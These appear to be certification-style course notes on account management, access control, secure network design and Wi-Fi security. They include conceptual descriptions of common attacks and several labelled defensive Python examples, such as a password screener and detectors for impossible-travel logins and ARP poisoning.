○ Superuser accounts directly contradict the principles of least privilege and
separation of duties.
○ Ubuntu Linux follows a similar approach; the root account is configured
with no password and locked, preventing login.

Service Accounts
● A host or network account that is designed to run a background service, rather
than to log on interactively.
● System—has the most privileges of any Windows account.
○ The local system account creates the host processes that start Windows
before the user logs on.
● Local Service—has the same privileges as the standard user account. It can only
access network resources as an anonymous user.
● Network Service—has the same privileges as the standard user account but can
present the computer's account credentials when accessing network resources.

Shared/Generic/Device Accounts and Credentials


● A shared account is one where passwords (or other authentication credentials)
are known to more than one person.
● A shared account breaks the principle of non-repudiation and makes an accurate
audit trail difficult to establish.
● Enterprise privilege access management products provide a solution for storing
these high-risk credentials somewhere other than a spreadsheet and for auditing
elevated privileges generally.

Secure Shell Keys and Third-Party Credentials
● Secure Shell (SSH) is a widely used remote access protocol. It is very likely to be
used to manage devices and services.
● SSH uses two types of key pairs:
○ A host key pair identifies an SSH server. The server reveals the public
part when a client connects to it.
■ The client must use some means of determining the validity of this
public key. If accepted, the key pair is used to encrypt the network
connection and start a session.
○ A user key pair is a means for a client to log in to an SSH server.
■ The server stores a copy of the client's public key. The client uses
the linked private key to generate an authentication request and
sends the request (not the private key) to the server. The server
can only validate this request if the correct public key is held for that
client.
● A third-party credential is one used by your company to manage a vendor service
or cloud app.
○ As well as administrative logons, devices and services may be configured
with a password or cryptographic keys to access hosts via SSH or via an
application programming interface (API).

Account Attributes and Access Policies


● Account Attributes:
○ A user account is defined by a unique security identifier (SID), a name,
and a credential.
○ The profile can be defined with custom identity attributes describing the
user, such as a full name, email address, contact number, department,
and so on.
● Access Policies:
○ Each account can be assigned permissions over files and other network
resources and access policies or privileges over the use and configuration
of network hosts.
○ Access policies determine things like the right to log on to a computer
locally or via remote desktop, install software, change the network
configuration, and so on.
○ On a Windows Active Directory network, access policies can be
configured via group policy objects (GPOs).
■ GPOs can be used to configure access rights for user/group/role
accounts.

Account Password Policy Settings


● System-enforced account policies can help to enforce credential management
principles by stipulating requirements for user-selected passwords.
○ The only restriction should be to block common passwords, such as
dictionary words, repetitive strings (like 12345678), strings found in breach
databases, and strings that repeat contextual information, such as
username or company name.
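Added example (not part of the original notes): a password screening check that applies the four blocklist categories named above. The word lists, account details and function names are constructed for illustration; matching dictionary words padded with trailing digits or symbols goes slightly beyond the text.

```python
import re

# Constructed sample lists for the demonstration. A real deployment would load
# a full dictionary and a breach corpus instead of these few entries.
DICTIONARY = {"password", "welcome", "dragon", "sunshine"}
BREACHED = {"qwerty123", "letmein!", "p@ssw0rd"}


def is_repetitive(password):
    """True for a short unit repeated (aaaaaa, abcabc) or a straight run (12345678)."""
    if re.fullmatch(r"(.{1,4})\1+", password):
        return True
    steps = {ord(b) - ord(a) for a, b in zip(password, password[1:])}
    return len(password) >= 4 and steps in ({1}, {-1})


def context_tokens(*values):
    """Split username, company name, etc. into lowercase tokens of 3+ characters."""
    tokens = set()
    for value in values:
        parts = re.split(r"[^a-z0-9]+", value.lower())
        tokens.update(part for part in parts if len(part) >= 3)
    return tokens


def check_password(password, username, company):
    """Return the blocklist rules the candidate violates (empty list = accepted)."""
    lowered = password.lower()
    reasons = []
    # Dictionary word, also when padded with trailing digits or symbols.
    if re.sub(r"[\d\W_]+$", "", lowered) in DICTIONARY:
        reasons.append("dictionary")
    # Exact match against the breach corpus.
    if lowered in BREACHED:
        reasons.append("breached")
    if is_repetitive(lowered):
        reasons.append("repetitive")
    # Contextual information: any token of the username or company name.
    if any(token in lowered for token in context_tokens(username, company)):
        reasons.append("contextual")
    return reasons


if __name__ == "__main__":
    # Constructed candidates for a hypothetical user "jsmith" at "Example Corp".
    for candidate in ["12345678", "Welcome2024!", "P@ssw0rd",
                      "JSmith-horse-battery", "correct horse battery staple"]:
        verdict = check_password(candidate, "jsmith", "Example Corp")
        print(f"{candidate!r:34} -> {verdict or 'accepted'}")
```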

Account Restrictions
● Location-Based Policies:
○ A user or device can have a logical network location, identified by an IP
address, subnet, virtual LAN (VLAN), or organizational unit (OU).
■ For example, a user account may be prevented from logging on
locally to servers within a restricted OU.
○ The geographical location of a user or device can also be calculated using
a geolocation mechanism.
■ IP address—these can be associated with a map location to
varying degrees of accuracy based on information published by the
registrant, including name, country, region, and city.
■ Location Services—these are methods used by the OS to calculate
the device's geographical position.
● Location services can also triangulate to cell towers, Wi-Fi
hotspots, and Bluetooth signals where GPS is not supported.
○ Geofencing refers to accepting or rejecting access requests based on
location.
■ Geofencing can also be used for push notification to send alerts or
advice to a device when a user enters a specific area.
● Time-Based Restrictions:
○ There are three main types of time-based policies:
■ A time of day policy establishes authorized logon hours for an
account.
■ A time-based login policy establishes the maximum amount of time
an account may be logged in for.
■ An impossible travel time/risky login policy tracks the location of
login events over time.
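Added example (not part of the original notes): detection logic for an impossible travel policy, comparing each login with the account's previous one. The events, the 900 km/h speed ceiling and the 50 km jitter allowance are assumptions made for illustration.

```python
import math
from datetime import datetime

MAX_PLAUSIBLE_KMH = 900.0  # assumption: about airliner cruising speed
MIN_DISTANCE_KM = 50.0     # assumption: ignore small moves and geolocation jitter

# Constructed login events: (account, UTC timestamp, latitude, longitude, place)
EVENTS = [
    ("alice", "2024-03-01T08:00:00", 51.5074, -0.1278, "London"),
    ("alice", "2024-03-01T10:00:00", 40.7128, -74.0060, "New York"),
    ("bob",   "2024-03-01T08:00:00", 35.6762, 139.6503, "Tokyo"),
    ("alice", "2024-03-01T09:30:00", 48.8566, 2.3522, "Paris"),
    ("bob",   "2024-03-02T08:00:00", 37.7749, -122.4194, "San Francisco"),
]


def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance between two points in kilometres."""
    radius_km = 6371.0
    phi1, phi2 = math.radians(lat1), math.radians(lat2)
    dphi = phi2 - phi1
    dlambda = math.radians(lon2 - lon1)
    a = (math.sin(dphi / 2) ** 2
         + math.cos(phi1) * math.cos(phi2) * math.sin(dlambda / 2) ** 2)
    return 2 * radius_km * math.asin(math.sqrt(a))


def find_impossible_travel(events, max_kmh=MAX_PLAUSIBLE_KMH):
    """Return (account, from, to, km, hours) for logins that imply impossible speed."""
    findings = []
    previous = {}  # account -> (time, lat, lon, place) of the last login seen
    # Events may arrive out of order, so sort per account by timestamp first.
    for account, stamp, lat, lon, place in sorted(events, key=lambda e: (e[0], e[1])):
        when = datetime.fromisoformat(stamp)
        if account in previous:
            p_when, p_lat, p_lon, p_place = previous[account]
            distance = haversine_km(p_lat, p_lon, lat, lon)
            hours = (when - p_when).total_seconds() / 3600.0
            # Simultaneous logins from distant places imply infinite speed.
            speed = distance / hours if hours > 0 else math.inf
            if distance >= MIN_DISTANCE_KM and speed > max_kmh:
                findings.append(
                    (account, p_place, place, round(distance), round(hours, 2)))
        previous[account] = (when, lat, lon, place)
    return findings


if __name__ == "__main__":
    for account, src, dst, km, hours in find_impossible_travel(EVENTS):
        print(f"RISKY LOGIN {account}: {src} -> {dst}, {km} km in {hours} h")
```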

Account Audits
● A security or audit log can be used to facilitate detection of account misuse:
○ Accounting for all actions that have been performed by users. Change and
version control systems depend on knowing when a file has been modified
and by whom.
○ Detecting intrusions or attempted intrusions. Here records of failure-type
events are likely to be more useful, though success-type events can also
be revealing if they show unusual access patterns.

Usage Audits
● Usage auditing means configuring the security log to record key indicators and
then reviewing the logs for suspicious activity.
● Microsoft has published audit policy recommendations for baseline requirements
and networks with stronger security requirements:
○ Account logon and management events.
○ Process creation.
○ Object access (file system/file shares).
○ Changes to audit policy.
○ Changes to system security and integrity (antivirus, host firewall, and so
on).

Account Lockout and Disablement


● If account misuse is detected or suspected, the account can be manually
disabled by setting an account property.
● This prevents the account from being used for login. Note that disabling the
account does not close existing sessions.
○ You can issue a remote logoff command to close a session.
● Setting an account expiration date means that an account cannot be used
beyond a certain date.

Discretionary and Role-Based Access Control


● An important consideration in designing a security system is to determine how
users receive rights or permissions.
● Discretionary Access Control (DAC):
○ Access control model where each resource is protected by an Access
Control List (ACL) managed by the resource's owner (or owners).
○ As the most flexible model, it is also the weakest because it makes
centralized administration of security policies the most difficult to enforce.
● Role-Based Access Control (RBAC):
○ An access control model where resources are protected by ACLs that are
managed by administrators and that provide user permissions based on
job functions.

File System Permissions


● With file system security, each object in the file system has an ACL associated
with it.
● Each record in the ACL is called an access control entry (ACE).
○ The order of ACEs in the ACL is important in determining effective
permissions for a given account.
● In Linux, there are three basic permissions:
○ Read (r)—the ability to access and view the contents of a file or list the
contents of a directory.
○ Write (w)—the ability to save changes to a file, or create, rename, and
delete files in a directory (also requires execute permission).
○ Execute (x)—the ability to run a script, program, or other software file, or
the ability to access a directory, execute a file from that directory, or
perform a task on that directory, such as file search.
● The chmod command is used to modify permissions. It can be used in symbolic
mode or absolute mode.

Mandatory and Attribute-Based Access Control


● Mandatory Access Control (MAC):
○ Based on the idea of security clearance levels. Rather than defining ACLs
on resources, each object and each subject is granted a clearance level,
referred to as a label.
● Attribute-Based Access Control (ABAC):
○ An access control technique that evaluates a set of attributes that each
subject possesses to determine if access should be granted.

Rule-Based Access Control


● A term that can refer to any sort of access control model where access control
policies are determined by system-enforced rules rather than system users.
● Conditional Access:
○ A conditional access system monitors account or device behavior
throughout a session.
○ If certain conditions are met, the account may be suspended or the user
may be required to reauthenticate, perhaps using a 2-step verification
method.
● Privileged Access Management:
○ A privileged account is one that can make significant configuration
changes to a host, such as installing software or disabling a firewall or
other security system.
○ Privileged access management (PAM) refers to policies, procedures,
and technical controls to prevent the malicious abuse of privileged
accounts and to mitigate risks from weak configuration control over
privileges.

Directory Services
● Directory services are the principal means of providing privilege management
and authorization on an enterprise network, storing information about users,
computers, security groups/roles, and services.
● The Lightweight Directory Access Protocol (LDAP) is a protocol widely used to
query and update X.500 format directories.
○ A distinguished name (DN) is a unique identifier for any given resource
within an X.500-like directory.
○ A distinguished name is made up of attribute=value pairs, separated by
commas.

Federation and Attestation


● Federation:
○ Federation is the notion that a network needs to be accessible to more
than just a well-defined group of employees.
○ In business, a company might need to make parts of its network open to
partners, suppliers, and customers.
○ Federation means that the company trusts accounts created and
managed by a different network.
■ If Google and Twitter establish a federated network for the purpose
of authentication and authorization, then the user can log on to
Twitter using his or her Google credentials or vice versa.
● Identity Providers and Attestation:
○ In these models, the networks perform federated identity management.

Security Assertion Markup Language


● A federated network or cloud needs specific protocols and technologies to
implement user identity assertions and transmit attestations between the
principal, the relying party, and the identity provider.
● Security Assertion Markup Language (SAML):
○ An XML-based data format used to exchange authentication information
between a client and a service.
● Simple Object Access Protocol (SOAP):
○ An XML-based web services protocol that is used to exchange messages.

OAuth and OpenID Connect


● Authentication and authorization for a RESTful API is often implemented using
the Open Authorization (OAuth) protocol.
● OAuth is designed to facilitate sharing of information (resources) within a user
profile between sites.
● The user can use that account to log on to an OAuth consumer site without
giving the password to the consumer site.
● OpenID Connect (OIDC):
○ An authentication protocol that can be implemented as special types of
OAuth flows with precisely defined token fields.

Conduct Policies
● Acceptable Use Policy:
○ A policy that governs employees' use of company equipment and Internet
services. ISPs may also apply AUPs to their customers.
○ The policy will forbid the use of equipment to defraud, to defame, or to
obtain illegal material.
● Code of Conduct and Social Media Analysis:
○ A code of conduct, or rules of behavior, sets out expected professional
standards.
■ For example, employees' use of social media and file sharing poses
substantial risks to the organization, including threat of virus
infection or systems intrusion, lost work time, copyright
infringement, and defamation.

Diversity of Training Techniques


● Capture the Flag:
○ Training event where learners must identify a token within a live network
environment.

Lesson 9: Implementing Secure Network Designs

Secure Network Designs


● Typical weaknesses include:
○ Single points of failure—a "pinch point" relying on a single hardware
server or appliance or network channel.
○ Complex dependencies—services that require many different systems to
be available.
○ Availability over confidentiality and integrity—often it is tempting to take
"shortcuts" to get a service up and running.
○ Lack of documentation and change control—network segments,
appliances, and services might be added without proper change control
procedures, leading to a lack of visibility into how the network is
constituted.
○ Overdependence on perimeter security—if the network architecture is
"flat" (that is, if any host can contact any other host), penetrating the
network edge gives the attacker freedom of movement.

Business Workflows and Network Architecture


● Network architecture is designed to support business workflows.
● You can illustrate the sorts of decisions that need to be made by analyzing a
simple workflow, such as email:
○ Access—the client device must access the network, obtaining a physical
channel and logical address.
■ The user must be authenticated and authorized to use the email
application.
○ Email mailbox server—ensure that the mailbox is only accessed by
authorized clients and that it is fully available and fault tolerant.
■ Ensure that the email service runs with a minimum number of
dependencies and that the service is designed to be resilient to
faults.
○ Mail transfer server—this must connect with untrusted Internet hosts, so
communications between the untrusted network and trusted LAN must be
carefully controlled.

Network Appliances
● A number of network appliances are involved in provisioning a network
architecture:
○ Switches—forward frames between nodes in a cabled network.
○ Wireless access points—provide a bridge between a cabled network and
wireless clients, or stations.
○ Routers—forward packets around an internetwork, making forwarding
decisions based on IP addresses.
■ Routers work at layer 3 of the OSI model. Routers can apply logical
IP subnet addresses to segments within a network.
○ Firewalls—apply an access control list (ACL) to filter traffic passing in or
out of a network segment.
○ Load balancers—distribute traffic between network segments or servers to
optimize performance.
○ Domain Name System (DNS) servers—host name records and perform
name resolution to allow applications and users to address hosts and
services using fully qualified domain names (FQDNs) rather than IP
addresses.

Routing and Switching Protocols


● The forwarding function takes place at two different layers:
○ Layer 2 forwarding occurs between nodes on the same local network
segment that are all in the same broadcast domain.
■ At layer 2, a broadcast domain is either all the nodes connected to
the same physical unmanaged switch, or all the nodes within a
virtual LAN (VLAN) configured on one or more managed switches.
○ Layer 3 forwarding, or routing, occurs between both logically and
physically defined networks.
■ A single network divided into multiple logical broadcast domains is
said to be subnetted.
■ Multiple networks joined by routers form an internetwork.
● Address Resolution Protocol (ARP):
○ The Address Resolution Protocol (ARP) maps a network interface's
hardware (MAC) address to an IP address.
● Routing Protocols:
○ Information about how to reach individual networks within an internetwork
is processed by routers, which store the data in a routing table.

Network Segmentation
● A network segment is one where all the hosts attached to the segment can use
local (layer 2) forwarding to communicate freely with one another.
● Segregation means that the hosts in one segment are restricted in the way they
communicate with hosts in other segments.

Network Topology and Zones


● The main building block of a security topology is the zone.
○ A zone is an area of the network where the security configuration is the
same for all hosts within it.
○ Zones should be segregated from one another by physical and/or logical
segmentation, using VLANs and subnets.
● Intranet (private network)—this is a network of trusted hosts owned and
controlled by the organization.
● Extranet—this is a network of semi-trusted hosts, typically representing business
partners, suppliers, or customers.
○ Hosts must authenticate to join the extranet.
● Internet/guest—this is a zone permitting anonymous access (or perhaps a mix of
anonymous and authenticated access) by untrusted hosts over the Internet.

Demilitarized Zones
● The most important distinction between different security zones is whether a host
is Internet-facing.
● Demilitarized Zones:
○ A segment isolated from the rest of a private network by one or more
firewalls that accepts connections from the Internet over designated ports.
○ The basic principle of a DMZ is that traffic cannot pass directly through it.
● A DMZ enables external clients to access data on private systems, such as web
servers, without compromising the security of the internal network as a whole.
● The hosts in a DMZ are not fully trusted by the internal network because of the
possibility that they could be compromised from the Internet.
○ They are referred to as bastion hosts and run minimal services to reduce
the attack surface as much as possible.

Demilitarized Zone Topologies


● To configure a DMZ, two different security configurations must be enabled: one
on the external interface and one on the internal interface.
● A DMZ and intranet are on different subnets, so communications between them
need to be routed.
● Screened Subnet:
○ A screened subnet uses two firewalls placed on either side of the DMZ.
○ The edge firewall restricts traffic on the external/public interface and
allows permitted traffic to the hosts in the DMZ.
■ The edge firewall can be referred to as the screening firewall or
router.
○ The internal firewall filters communications between hosts in the DMZ and
hosts on the LAN.
■ This firewall is often described as the choke firewall. A choke point
is a purposefully narrow gateway that facilitates better access
control and easier monitoring.

● Triple-Homed Firewall:
○ A DMZ can also be established using one router/firewall appliance with
three network interfaces, referred to as triple-homed.
○ One interface is the public one, another is the DMZ, and the third connects
to the LAN.
○ Routing and filtering rules determine what forwarding is allowed between
these interfaces.


Screened Hosts
● Smaller networks may not have the budget or technical expertise to implement a
DMZ.
● In this case, Internet access can still be implemented using a dual-homed
proxy/gateway server acting as a screened host.
○ Screened Host: A dual-homed proxy/gateway server used to provide
Internet access to other network nodes, while protecting them from
external attack.

Implications of IPv6
● If IPv6 is enabled but unmanaged, there is the potential for malicious use as a
backdoor or covert channel.
● Firewalls should be configured with ACLs that either achieve the same security
configuration as for IPv4 or block IPv6, if that is a better option.

Other Secure Network Design Considerations


● East-West Traffic:
○ In data centers that support cloud and other Internet services, most traffic
is actually between servers within the data center.
○ This is referred to as east-west traffic.
● Zero trust architectures assume that nothing should be taken for granted and
that all network access must be continuously verified and authorized.
○ A Zero Trust architecture can protect data, applications, networks, and
systems from malicious attacks and unauthorized access more effectively
than a traditional architecture by ensuring that only necessary services are
allowed and only from appropriate sources.

Man-In-The-Middle and Layer 2 Attacks


● Attacks at the physical and data link layers, referred to in the OSI model as layer
1 and layer 2, are often focused on information gathering—network mapping
and eavesdropping on network traffic.
● Man-in-the-Middle/On-Path Attacks:
○ A MitM or on-path attack is where the threat actor gains a position
between two hosts, and transparently captures, monitors, and relays all
communication between the hosts.
● MAC Cloning:
○ MAC cloning, or MAC address spoofing, changes the hardware address
configured on an adapter interface or asserts the use of an arbitrary MAC
address.
○ While a unique MAC address is assigned to each network interface by the
vendor at the factory, it is simple to override it in software via OS
commands, alterations to the network driver configuration, or using packet
crafting software.

ARP Poisoning and MAC Flooding Attacks


● A host uses the Address Resolution Protocol (ARP) to discover which host on
the local segment owns an IP address.
● ARP Poisoning Attacks:
○ An ARP poisoning attack uses a packet crafter, such as Ettercap, to
broadcast unsolicited ARP reply packets.
○ Because ARP has no security mechanism, the receiving devices trust this
communication and update their MAC:IP address cache table with the
spoofed address.
○ The usual target will be the subnet's default gateway (the router that
accesses other networks).
○ If the ARP poisoning attack is successful, all traffic destined for remote
networks will be sent to the attacker.
● MAC Flooding Attacks:
○ MAC flooding is used to attack a switch.
○ The intention of the attacker is to exhaust the memory used to store the
switch's MAC address table.
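Added example (not part of the original notes): detection logic for the ARP poisoning pattern described above, flagging an IP address whose MAC binding changes and marking unsolicited replies and the default gateway. The observations, addresses and function names are constructed; treating the first binding seen as the baseline is an assumption (a real sensor would seed it from static entries or DHCP records).

```python
# Constructed ARP observations, as a sensor on the segment might record them:
# (sequence, operation, sender_ip, sender_mac, target_ip)
OBSERVED = [
    (1, "request", "10.0.0.23", "aa:aa:aa:00:00:23", "10.0.0.1"),
    (2, "reply",   "10.0.0.1",  "aa:aa:aa:00:00:01", "10.0.0.23"),
    (3, "reply",   "10.0.0.1",  "de:ad:be:ef:00:66", "10.0.0.23"),
    (4, "reply",   "10.0.0.1",  "de:ad:be:ef:00:66", "10.0.0.24"),
    (5, "request", "10.0.0.24", "aa:aa:aa:00:00:24", "10.0.0.23"),
    (6, "reply",   "10.0.0.23", "aa:aa:aa:00:00:23", "10.0.0.24"),
]
GATEWAY_IP = "10.0.0.1"  # the subnet's default gateway in this constructed sample


def detect_arp_conflicts(events, gateway_ip):
    """Return an alert for every ARP message that contradicts the known binding."""
    bindings = {}    # ip -> MAC first learned for it (assumed baseline)
    pending = set()  # IPs that some host has asked about and not yet heard from
    alerts = []
    for seq, op, sender_ip, sender_mac, target_ip in events:
        solicited = False
        if op == "request":
            pending.add(target_ip)
        elif op == "reply":
            # A reply is solicited only if a request for that IP was seen first.
            solicited = sender_ip in pending
            pending.discard(sender_ip)
        # Requests and replies both carry a sender binding that hosts cache.
        baseline = bindings.setdefault(sender_ip, sender_mac)
        if baseline != sender_mac:
            alerts.append({
                "seq": seq,
                "ip": sender_ip,
                "expected_mac": baseline,
                "claimed_mac": sender_mac,
                "unsolicited": op == "reply" and not solicited,
                # Traffic for remote networks flows through the gateway binding.
                "severity": "critical" if sender_ip == gateway_ip else "warning",
            })
    return alerts


def summarize(alerts):
    """Collapse repeated alerts into {(ip, claimed_mac): count} for triage."""
    summary = {}
    for alert in alerts:
        key = (alert["ip"], alert["claimed_mac"])
        summary[key] = summary.get(key, 0) + 1
    return summary


if __name__ == "__main__":
    for alert in detect_arp_conflicts(OBSERVED, GATEWAY_IP):
        print(alert)
```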

Loop Prevention
● As a layer 2 protocol, Ethernet has no concept of Time To Live.
● Therefore, layer 2 broadcast traffic could continue to loop through a network with
multiple paths indefinitely.
● Layer 2 loops are prevented by the Spanning Tree Protocol (STP).
○ Spanning tree is a means for the bridges to organize themselves into a
hierarchy and prevent loops from forming.
● Broadcast Storm Prevention:
○ STP is principally designed to prevent broadcast storms.
○ If a bridged network contains a loop, broadcast traffic will travel through
the network, get amplified by the other switches, and arrive back at the
original switch, which will re-broadcast each incoming broadcast frame,
causing an exponential increase (the storm), which will rapidly overwhelm
the switches and crash the network.
○ A storm control setting on a switch is a backup mechanism to rate-limit
broadcast traffic above a certain threshold.
● Bridge Protocol Data Unit (BPDU) Guard:
○ A threat actor might try to attack STP using a rogue switch or software
designed to imitate a switch.
○ BPDU Guard is a switch port security feature that can disable a port if it
receives a BPDU from a connected device.
○ Topology changes in STP can cause a switch to flush the cache more
frequently and to start flooding unicast traffic more frequently, which can
have a serious impact on network performance and assists sniffing
attacks.

Physical Port Security and MAC Filtering


● Port Security: Preventing a device attached to a switch port from communicating
on the network unless it matches a given MAC address or other protection
profile.
● MAC Filtering and MAC Limiting:
○ Configuring MAC filtering on a switch means defining which MAC
addresses are allowed to connect to a particular port.
○ This can be done by creating a list of valid MAC addresses or by
specifying a limit to the number of permitted addresses.
● DHCP Snooping:
○ A configuration option that enables a switch to inspect DHCP traffic to
prevent MAC spoofing.
○ DHCP snooping inspects this traffic arriving on access ports to ensure that
a host is not trying to spoof its MAC address.

Network Access Control


● The IEEE 802.1X standard defines a port-based network access control
(PNAC) mechanism.
○ PNAC means that the switch uses an Authentication, Authorization, and
Accounting (AAA) server to authenticate the attached device before
activating the port.
● Network access control (NAC) products can extend the scope of authentication
to allow administrators to devise policies or profiles describing a minimum
security configuration that devices must meet to be granted network access.
○ This is called a health policy.
● Posture assessment is the process by which host health checks are performed
against a client device to verify compliance with the health policy.

Route Security
● A successful attack against route security enables the attacker to redirect traffic
from its intended destination.
● Routing is subject to numerous vulnerabilities, including:
○ Spoofed routing information (route injection)—Routing protocols that have
no or weak authentication are vulnerable to route table poisoning.
■ This can mean that traffic is misdirected to a monitoring port
(sniffing), sent to a blackhole (nonexistent address), or continuously
looped around the network, causing DoS.
○ Source routing—This uses an option in the IP header to pre-determine the
route a packet will take through the network (strict) or "waypoints" that it
must pass through (loose).
○ Software exploits in the underlying operating system—Hardware routers
(and switches) have an embedded operating system.

Wireless Network Installation Considerations


● Wireless network installation considerations refer to the factors that ensure good
availability of authorized Wi-Fi access points.
● WAP Placement:
○ The access points forward traffic to and from the wired switched network.
○ Each WAP is identified by its MAC address, also referred to as its basic
service set identifier (BSSID).

Controller and Access Point Security


● Wireless Controllers: A device that provides wireless LAN management for
multiple APs.
● An access point whose firmware contains enough processing logic to be able to
function autonomously and handle clients without the use of a wireless controller
is known as a fat WAP.
● An access point that requires a wireless controller in order to function is
known as a thin WAP.

Wi-Fi Protected Access
● WPA2 uses the Advanced Encryption Standard (AES) cipher with 128-bit keys,
deployed within the Counter Mode with Cipher Block Chaining Message
Authentication Code Protocol (CCMP).
● Weaknesses have also been found in WPA2, however, which has led to its
intended replacement by WPA3.
● The main features of WPA3 are as follows:
○ Simultaneous Authentication of Equals (SAE)—replaces WPA's 4-way
handshake authentication and association mechanism with a protocol
based on Diffie-Hellman key agreement.
○ Enhanced Open—enables encryption for the open authentication method.
○ Updated cryptographic protocols—replaces AES CCMP with the AES
Galois Counter Mode Protocol (GCMP) mode of operation.
○ Management protection frames—mandates use of these to protect against
key recovery attacks.

Wi-Fi Authentication Methods


● WPA2 Pre-Shared Key Authentication:
○ In WPA2, pre-shared key (PSK) authentication uses a passphrase to
generate the key that is used to encrypt communications.
○ The administrator configures a passphrase of between 8 and 63 ASCII
characters.
■ This is converted to a 256-bit HMAC (expressed as a 64-character
hex value) using the PBKDF2 key stretching algorithm.
● WPA3 Personal Authentication:
○ While WPA3 still uses a passphrase to authenticate stations in personal
mode, it changes the method by which this secret is used to agree upon
session keys.
○ The Simultaneous Authentication of Equals (SAE) protocol replaces the 4-way
handshake, which has been found to be vulnerable to various attacks.
○ SAE uses the Dragonfly handshake, which is basically Diffie-Hellman key
agreement over elliptic curves, combined with a hash value derived from
the password and device MAC address to authenticate the nodes.
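The WPA2 passphrase-to-key conversion described above, as an added example that is not part of the original notes. It assumes the standard WPA2 parameters (PBKDF2 with HMAC-SHA1, the SSID as salt, 4096 iterations); the function names are hypothetical, and the SSID and passphrase in any call are sample values.

```python
import hashlib
import re

ITERATIONS = 4096      # fixed by the WPA2 passphrase-to-PSK mapping
KEY_BYTES = 32         # 256-bit key, shown as 64 hex characters


def wpa2_psk(passphrase: str, ssid: str) -> str:
    """Derive the 256-bit WPA2 PSK from a passphrase, salted with the SSID."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("passphrase must be 8 to 63 characters")
    if any(not 32 <= ord(ch) <= 126 for ch in passphrase):
        raise ValueError("passphrase must be printable ASCII")
    salt = ssid.encode("utf-8")
    if not 1 <= len(salt) <= 32:
        raise ValueError("SSID must be 1 to 32 bytes")
    key = hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"), salt,
                              ITERATIONS, dklen=KEY_BYTES)
    return key.hex()


def resolve_psk(secret: str, ssid: str) -> str:
    """Accept either a passphrase or an already-derived 64-hex-digit key."""
    if re.fullmatch(r"[0-9A-Fa-f]{64}", secret):
        return secret.lower()          # raw key: key stretching is not applied
    return wpa2_psk(secret, ssid)


def network_block(ssid: str, passphrase: str) -> str:
    """wpa_supplicant-style stanza holding the derived key, not the passphrase."""
    if '"' in ssid or "\\" in ssid:
        raise ValueError("SSID needs escaping; not handled in this example")
    return 'network={\n\tssid="%s"\n\tpsk=%s\n}' % (ssid, wpa2_psk(passphrase, ssid))
```

Because the SSID is the salt, the same passphrase yields a different key on every differently named network, and the derived key is as sensitive as the passphrase for that SSID.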

Wi-Fi Protected Setup


● As setting up an access point securely is relatively complex for residential
consumers, vendors have developed a system to automate the process called
Wi-Fi Protected Setup (WPS).
● To use WPS, both the access point and wireless station (client device) must be
WPS-capable.
● Activating WPS on the access point and the adapter simultaneously will associate
the devices using a PIN, then associate the adapter with the access point using
WPA2.
● WPS is vulnerable to a brute force attack.
○ The PIN is verified as two separate, shorter PINs. These separate PINs are
many orders of magnitude simpler to brute force, typically requiring just
hours to crack.

Open Authentication and Captive Portals


● Selecting open authentication means that the client is not required to
authenticate.
○ This mode would be used on a public WAP (or "hotspot").
● Open authentication may be combined with a secondary authentication
mechanism managed via a browser.
○ When the client associates with the open hotspot and launches the
browser, the client is redirected to a captive portal or splash page.
○ This will allow the client to authenticate to the hotspot provider's network
(over HTTPS, so the login is secure).

Enterprise/IEEE 802.1X Authentication


● As an alternative to personal authentication, the enterprise authentication method
implements IEEE 802.1X to use an Extensible Authentication Protocol (EAP)
mechanism.
● 802.1X defines the use of EAP over Wireless (EAPoW) to allow an access point
to forward authentication data without allowing any other type of network access.
● It is configured by selecting WPA2-Enterprise or WPA3-Enterprise as the security
method on the access point.

Extensible Authentication Protocol


● The Extensible Authentication Protocol (EAP) defines a framework for
negotiating authentication mechanisms rather than the details of the mechanisms
themselves.
● EAP-TLS is one of the strongest types of authentication and is very widely
supported.
● An encrypted Transport Layer Security (TLS) tunnel is established between the
supplicant and authentication server using public key certificates on the
authentication server and supplicant.

PEAP, EAP-TTLS, and EAP-FAST


● Protected Extensible Authentication Protocol (PEAP):
○ EAP implementation that uses a server-side certificate to create a secure
tunnel for user authentication, referred to as the inner method.
○ The supplicant does not require a certificate.
● EAP with Tunneled TLS (EAP-TTLS):
○ An EAP method that enables a client and server to establish a secure
connection without mandating a client-side certificate.
○ The main distinction from PEAP is that EAP-TTLS can use any inner
authentication protocol (PAP or CHAP, for instance), while PEAP must
use EAP-MS-CHAPv2 or EAP-GTC.
● EAP with Flexible Authentication via Secure Tunneling (EAP-FAST):
○ An EAP method developed by Cisco as a replacement for LEAP. EAP-
FAST does not require a certificate authority while aiming to provide a
higher level of security.
○ Instead of using a certificate to set up the tunnel, it uses a Protected
Access Credential (PAC), which is generated for each user from the
authentication server's master key.

RADIUS Federation
● Most implementations of EAP use a RADIUS server to validate the authentication
credentials for each user (supplicant).
● RADIUS federation means that multiple organizations allow access to one
another's users by joining their RADIUS servers into a RADIUS hierarchy or
mesh.

Rogue Access Points and Evil Twins


● A rogue access point is one that has been installed on the network without
authorization, whether with malicious intent or not.
○ A malicious user can set up such an access point with something as basic
as a smartphone with tethering capabilities, and a non-malicious user
could enable such an access point by accident.
○ If connected to a LAN without security, an unauthorized WAP creates a
backdoor through which to attack the network.
● An evil twin is a rogue WAP masquerading as a legitimate one. It might just have
a similar name (SSID) to the legitimate WAP, or the attacker might use some DoS
technique to overcome the legitimate WAP.
● A rogue hardware WAP can be identified through physical inspections. There are
also various Wi-Fi analyzers and monitoring systems that can detect rogue
WAPs, including inSSIDer.

Disassociation and Replay Attacks


● The access point normally broadcasts a beacon frame to advertise service
capabilities. Clients can choose to first authenticate and then associate to an
access point when they move into range of the beacon.
● The client or access point can use disassociation and/or deauthentication
frames to notify the other party that it has ended a connection.
○ A disassociation frame is sent in order to terminate the association from
either side in an access point.
○ A deauthentication frame is used to completely end a connection with a
Wi-Fi network.
● A disassociation attack exploits the lack of encryption in management frame
traffic to send spoofed frames.
○ One type of disassociation attack injects management frames that spoof
the MAC address of a single victim station in a disassociation notification,
causing it to be disconnected from the network.
○ Another variant of the attack broadcasts spoofed frames to disconnect all
stations.
● Disassociation/deauthentication attacks may be used to perform a denial of
service attack against the wireless infrastructure or to exploit disconnected
stations to try to force reconnection to a rogue WAP.
● The attacks can be mitigated if the wireless infrastructure supports Management
Frame Protection (MFP/802.11w).

Jamming Attacks
● A Wi-Fi jamming attack can be performed by setting up a WAP with a stronger
signal.
○ Jamming is an attack in which radio waves disrupt 802.11 wireless signals.
